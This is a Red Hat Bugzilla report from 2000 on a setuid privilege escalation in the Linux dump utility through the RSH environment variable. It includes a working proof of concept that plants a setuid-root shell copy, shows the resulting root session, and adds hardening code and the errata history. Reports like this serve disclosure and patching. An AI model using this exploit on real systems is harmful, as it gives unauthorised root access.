Bug 20111 - RH6.2 dump SUID exploit (via RSH env. var)
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: dump
Version: 6.2
Hardware: All
OS: Linux
Priority: high
Severity: medium
Assigned To: Nalin Dahyabhai
Dale Lovelace
Keywords: Security
Duplicates: 20112 20565
Reported: 2000-10-31 12:52 EST by Philip Rowlands
Modified: 2007-03-26 23:37 EDT (History)

Doc Type: Bug Fix
Last Closed: 2000-11-02 22:08:22 EST
Description Philip Rowlands 2000-10-31 12:52:26 EST
This is from Bugtraq. Tested, works :(


1. Problem:
The Linux dump command executes an external program with suid privilege.

2. Tested Version
dump-0.4b15

3. Example
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
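The defect above, shown beside the two usual defences as an added example (this is not dump's own code and not the change shipped in dump-0.4b19): a setuid-root program that trusts $RSH while its effective uid is still 0 runs whatever the variable names as root; the hardened version ignores $RSH when running with elevated privilege and permanently drops root before the exec. DEFAULT_RSH and the function names are assumed for illustration.

```c
/* Added example, not dump's own code: how a setuid-root program should treat an
 * environment-supplied helper such as $RSH. DEFAULT_RSH is an assumed path. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_RSH "/usr/bin/rsh"

/* Vulnerable pattern from the report: $RSH is trusted while euid is still 0,
 * so whatever it names is executed as root. */
const char *rsh_unsafe(const char *env_rsh)
{
    return (env_rsh && *env_rsh) ? env_rsh : DEFAULT_RSH;
}

/* Defence 1: honour $RSH only when no privilege is being elevated
 * (real uid equals effective uid); otherwise fall back to the default. */
const char *rsh_safe(const char *env_rsh, uid_t ruid, uid_t euid)
{
    if (env_rsh && *env_rsh && ruid == euid)
        return env_rsh;
    return DEFAULT_RSH;
}

/* Defence 2: drop root permanently (group first, then user) and verify that
 * it cannot be regained. Returns 0 on success, -1 otherwise. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    if (ruid != 0 && setuid(0) == 0)      /* root came back: not dropped */
        return -1;
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Exec the helper only after both defences; does not return on success. */
int run_rsh(const char *host, const char *cmd)
{
    const char *rsh = rsh_safe(getenv("RSH"), getuid(), geteuid());
    if (drop_privileges() != 0)
        return -1;
    execlp(rsh, rsh, host, cmd, (char *)NULL);
    perror("execlp");                     /* only reached if exec failed */
    return -1;
}
```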
Comment 1 Philip Rowlands 2000-10-31 13:11:49 EST
Advice for anyone who needs a quick fix: either remove the package, if you don't
need it (rpm -e dump), or remove the SUID bit from /sbin/dump *and*
/sbin/restore (restore(8) lists the same RSH variable).
Comment 2 Daniel Roesen 2000-10-31 15:56:29 EST
*** Bug 20112 has been marked as a duplicate of this bug. ***
Comment 3 Jeff Johnson 2000-11-01 16:25:39 EST
Fixed in dump-0.4b19-5.
Comment 4 Daniel Roesen 2000-11-02 21:11:25 EST
dump-static obviously suffers from the same problem, so an errata update is
needed for this package, too. Reopening.
Comment 5 Daniel Roesen 2000-11-02 22:08:19 EST
The advisory mentions update RPMs for dump-static and rmt, but they are not on
updates.redhat.com.
Comment 6 Daniel Roesen 2000-11-03 13:48:37 EST
19:48:40 `SRPMS/dump-0.4b19-5.6x.src.rpm' size = 166647 has new time, getting
19:48:41 `i386/dump-0.4b19-5.6x.i386.rpm' size = 88538 has new time, getting
19:48:41 `i386/dump-static-0.4b19-5.6x.i386.rpm' size = 426967 is missing, getting.
19:48:41 `i386/rmt-0.4b19-5.6x.i386.rpm' size = 12550 is missing, getting.

ok, so the dump errata was re-issued, now with dump-static & rmt. Closing bug.
Comment 7 Jeff Johnson 2000-11-09 08:15:18 EST
*** Bug 20565 has been marked as a duplicate of this bug. ***